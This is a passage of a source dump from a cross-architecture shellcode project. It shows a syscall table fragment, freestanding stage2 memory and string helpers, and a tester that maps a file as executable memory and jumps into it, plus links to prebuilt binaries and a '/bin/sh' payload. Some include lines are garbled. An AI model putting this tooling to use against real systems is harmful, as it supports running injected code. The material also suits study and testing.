| #define __NR_prlimit64 302 307 | #define __NR_name_to_handle_at 303 308 | #define __NR_open_by_handle_at 304 309 | #define __NR_clock_adjtime 305 310 | #define __NR_syncfs 306 311 | #define __NR_sendmmsg 307 312 | #define __NR_setns 308 313 | #define __NR_getcpu 309 314 | #define __NR_process_vm_readv 310 315 | #define __NR_process_vm_writev 311 316 | #define __NR_kcmp 312 317 | #define __NR_finit_module 313 318 | #define __NR_sched_setattr 314 319 | #define __NR_sched_getattr 315 320 | #define __NR_renameat2 316 321 | #define __NR_memfd_create 319 322 | 323 | #endif /* _ASM_X86_UNISTD_64_H */ 324 | -------------------------------------------------------------------------------- /stage2/utils.c: -------------------------------------------------------------------------------- 1 | #include "utils.h" 2 | 3 | void memset(void * dst, unsigned char c, unsigned int len) 4 | { 5 | unsigned char * p = (unsigned char *) dst; 6 | 7 | while(len--) 8 | *p++ = c; 9 | } 10 | 
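/* Compare len bytes of dst and src.
 * Unlike ISO memcmp this only reports equality: 0 when every byte matches,
 * 1 at the first difference. It carries no ordering information, so it
 * cannot be used as a sort comparator. */
int memcmp(void * dst, void * src, unsigned int len)
{
    unsigned char * d = (unsigned char *) dst;
    unsigned char * s = (unsigned char *) src;

    while(len-- > 0)
        if(*d++ != *s++)
            return 1;

    return 0;
}

/* Copy len bytes from src to dst, lowest address first.
 * The regions must not overlap (this is memcpy, not memmove). Returns
 * nothing, unlike ISO memcpy, so callers cannot chain on a returned dst. */
void memcpy(void *dst, void *src, unsigned int len)
{
    unsigned char * d = (unsigned char *) dst;
    unsigned char * s = (unsigned char *) src;

    while(len--)
        *d++ = *s++;
}

/* Number of bytes before the terminating NUL of str. */
int strlen(unsigned char *str)
{
    int n = 0;

    while(*str++)
        n++;

    return n;
}

/* Format str with the project's vsnprintf into a 4 KiB stack buffer and send
 * the result to fd 1 through the raw write syscall.
 * Output longer than the buffer is truncated; a formatting error prints
 * nothing. */
void printf(char *str, ...)
{
    int len;
    va_list vl;
    char buf[4096];

    va_start (vl, str);
    len = vsnprintf (buf, sizeof (buf), str, vl);
    va_end (vl);
    buf[sizeof (buf) - 1] = '\0';

    /* A C99-style vsnprintf returns the length the output *would* have had,
     * which can exceed the buffer; the old code passed that straight to
     * _write and so could emit stack bytes beyond buf. Clamp to what the
     * buffer really holds, and treat a negative return as "nothing to write".
     * (The project's own vsnprintf lives in snprintf.c; the clamp is safe
     * whichever convention it follows.) */
    if(len < 0)
        return;
    if((size_t) len > sizeof (buf) - 1)
        len = (int) (sizeof (buf) - 1);

    _write(1, buf, len);
}


// MBH malloc
// use mmap for every required block
// block header = [unsigned long user_size] [unsigned long allocd_size]
#define MBM_PAGE_SIZE 0x1000
#define MBM_SIZE_USER(ptr) (*(unsigned long *) ((unsigned long)(ptr) - 2 * sizeof(unsigned long)))
#define MBM_SIZE_ALLOC(ptr) (*(unsigned long *) ((unsigned long)(ptr) - 1 * sizeof(unsigned long)))
#define MBM_SIZE_HDR (2 * sizeof(unsigned long))

/* Resize a block, or create one when addr is NULL.
 *
 * Every block is its own anonymous mapping of whole pages; the user pointer
 * is preceded by the two-word header [user_size][allocd_size] that
 * MBM_SIZE_USER / MBM_SIZE_ALLOC read.
 *
 * Returns the (possibly moved) user pointer, or NULL when size is 0, the
 * header/page arithmetic would overflow, or the mmap syscall fails. On a
 * NULL return the old block is left untouched, as with ISO realloc. */
void * realloc(void * addr, size_t size)
{
    size_t alloc_size;
    unsigned long mem;

    if(!size)
        return NULL;

    /* The existing mapping already has room: just record the new user size.
     * The original compared against a hard-coded single page; using the
     * block's real mapping size also resizes multi-page blocks in place. */
    if(addr && size <= MBM_SIZE_ALLOC(addr) - MBM_SIZE_HDR)
    {
        MBM_SIZE_USER(addr) = size;
        return addr;
    }

    /* Guard the header add and the page rounding below against size_t wrap. */
    if(size > (size_t) -1 - MBM_SIZE_HDR - MBM_PAGE_SIZE)
        return NULL;

    alloc_size = size + MBM_SIZE_HDR;
    if(alloc_size % MBM_PAGE_SIZE)
        alloc_size = ((alloc_size / MBM_PAGE_SIZE) + 1) * MBM_PAGE_SIZE;

    mem = (unsigned long) _mmap(NULL, alloc_size, PROT_READ|PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    /* mem is unsigned, so the previous `mem < 0` test could never be true
     * and a failed mapping was used as a pointer. A raw mmap syscall reports
     * failure as -errno, i.e. a value in the last 4095 bytes of the address
     * space, which is what this range test catches (and MAP_FAILED falls in
     * it too). NOTE(review): assumes _mmap returns the raw syscall result —
     * confirm against the syscall_*.c implementations. */
    if(mem >= (unsigned long) -4095)
    {
        /* Pass the int-sized value %x expects instead of a size_t. */
        printf("> memory allocation error (0x%x bytes)\n", (unsigned int) alloc_size);
        return NULL;
    }

    mem += MBM_SIZE_HDR;
    MBM_SIZE_USER(mem) = size;
    MBM_SIZE_ALLOC(mem) = alloc_size;

    if(addr)
    {
        /* Copy no more than the new block holds. The old code copied the
         * old block's full user size, so shrinking a block that still
         * needed a fresh mapping wrote past the end of the new one. With
         * the in-place path above the old size is normally the smaller
         * one; the min keeps that a non-issue rather than an invariant. */
        unsigned long keep = MBM_SIZE_USER(addr);
        if(keep > size)
            keep = size;
        if(keep)
            memcpy((void*)mem, addr, keep);
        free(addr);
    }

    return (void*)mem;
}

/* Allocate len bytes; a thin wrapper over realloc(NULL, len). */
void * malloc(size_t len)
{
    return realloc(NULL, len);
}

/* Release a block obtained from malloc/realloc by unmapping its pages.
 * NULL is a no-op. The mapping length is taken from the block header, so
 * ptr must be a live user pointer from this allocator. */
void free(void * ptr)
{
    char * page;

    if(!ptr)
        return;

    /* The header sits directly below the user pointer and is the start of
     * the mapping; compute it only after the NULL check. */
    page = (char *)(ptr) - MBM_SIZE_HDR;
    _munmap(page, MBM_SIZE_ALLOC(ptr));
}


/* ------------------------------------------------------------------------- */
/* /stage2/utils.h:                                                          */
/* ------------------------------------------------------------------------- */
#ifndef _SYMB_UTILS_H
#define _SYMB_UTILS_H

#include "linuxdefs.h"
#include /* <...>: header name lost in page extraction */

/* Freestanding string helpers. Signatures intentionally differ from libc:
 * memset/memcpy return nothing and memcmp only reports 0 (equal) / 1. */
void memset(void * dst, unsigned char c, unsigned int len);
int memcmp(void * dst, void * src, unsigned int len);
void memcpy(void *dst, void *src, unsigned int len);
int strlen(unsigned char *str);
void printf(char *str, ...);

// mem alloc
void * realloc(void * addr, size_t size);
void * malloc(size_t len);
void free(void * ptr);

// avoid int truncation issue
void * _mmap(void * start, long length, int prot, int flags, int fd, long offset);

#endif

/* ------------------------------------------------------------------------- */
/* /tools/README:                                                            */
/* ------------------------------------------------------------------------- */
/*
 * 2016 - ixty
 *
 * Shellcode testing utility
 *
 * Compiled version distributed for each supported arch
 * Use this utility to verify that the output functions correctly
 *
 *     user@x86_64-box $ ./sc_86 ./output
 *     user@x86_64-box $ ./sc_x86_64 ./output
 *     user@armhf-chroot $ ./sc_arm ./output
 *     user@arm64-chroot $ ./sc_arm_64 ./output
 */

/* ------------------------------------------------------------------------- */
/* /tools/sc.c:                                                              */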
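/* ------------------------------------------------------------------------- */
// 2016 - ixty
// shellcode testing utility
// compile with:
// $ gcc -o sc sc.c

#include /* header name lost in page extraction */
#include /* header name lost in page extraction */
#include /* header name lost in page extraction */

/* Load the file named by av[1] into a fresh readable/writable/executable
 * anonymous mapping and jump to its first byte.
 * Returns 1 on a usage error, an unreadable or empty file, or a failed
 * mapping; otherwise control passes to the payload and 0 is returned only
 * if it comes back. */
int main(int ac, char ** av)
{
    FILE * f;
    long fsize;
    size_t l, ml;
    char * mem;

    if(ac < 2 || !(f = fopen(av[1], "rb")))
    {
        printf("> usage %s \n", av[0]);
        return 1;
    }
    fseek(f, 0, SEEK_END);
    fsize = ftell(f);
    fseek(f, 0, SEEK_SET);

    /* ftell reports failure as -1; storing that straight into size_t made it
     * a huge length. An empty file has nothing to run either. */
    if(fsize <= 0)
    {
        fclose(f);
        return 1;
    }
    l = (size_t) fsize;

    /* Round the mapping up to whole pages, at least one page. */
    ml = 0x1000;
    while(ml < l)
        ml += 0x1000;

    mem = (char*)mmap(NULL, ml, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    /* mmap signals failure with MAP_FAILED ((void *) -1), never NULL, so
     * the old `!mem` test let a failed mapping through to fread. */
    if(mem == MAP_FAILED)
    {
        fclose(f);
        return 1;
    }

    /* Read byte-wise so a short read is detected instead of executing a
     * partially filled page. */
    if(fread(mem, 1, l, f) != l)
    {
        fclose(f);
        return 1;
    }
    fclose(f);
    /* Same protection the mapping was created with; kept from the original. */
    mprotect(mem, ml, PROT_READ | PROT_WRITE | PROT_EXEC);

    /* l and ml are size_t and mem is a pointer: %x with them is undefined
     * on 64-bit targets and printed truncated values; %zx / %p match. */
    printf("> sc len 0x%zx allocated 0x%zx bytes @ %p\n", l, ml, (void *) mem);
    (*(void(*)()) mem)();

    return 0;
}

/* ------------------------------------------------------------------------- */
/* /tools/sc_arm: (binary)                                                   */
/* https://raw.githubusercontent.com/ixty/xarch_shellcode/9fd9e373fe043c95e16f3b355e21c4572478aed6/tools/sc_arm */
/* ------------------------------------------------------------------------- */
/* /tools/sc_arm_64: (binary)                                                */
/* https://raw.githubusercontent.com/ixty/xarch_shellcode/9fd9e373fe043c95e16f3b355e21c4572478aed6/tools/sc_arm_64 */
/* ------------------------------------------------------------------------- */
/* /tools/sc_x86: (binary)                                                   */
/* https://raw.githubusercontent.com/ixty/xarch_shellcode/9fd9e373fe043c95e16f3b355e21c4572478aed6/tools/sc_x86 */
/* ------------------------------------------------------------------------- */
/* /tools/sc_x86_64: (binary)                                                */
/* ------------------------------------------------------------------------- */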
https://raw.githubusercontent.com/ixty/xarch_shellcode/9fd9e373fe043c95e16f3b355e21c4572478aed6/tools/sc_x86_64 -------------------------------------------------------------------------------- /xarch_binsh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ixty/xarch_shellcode/9fd9e373fe043c95e16f3b355e21c4572478aed6/xarch_binsh --------------------------------------------------------------------------------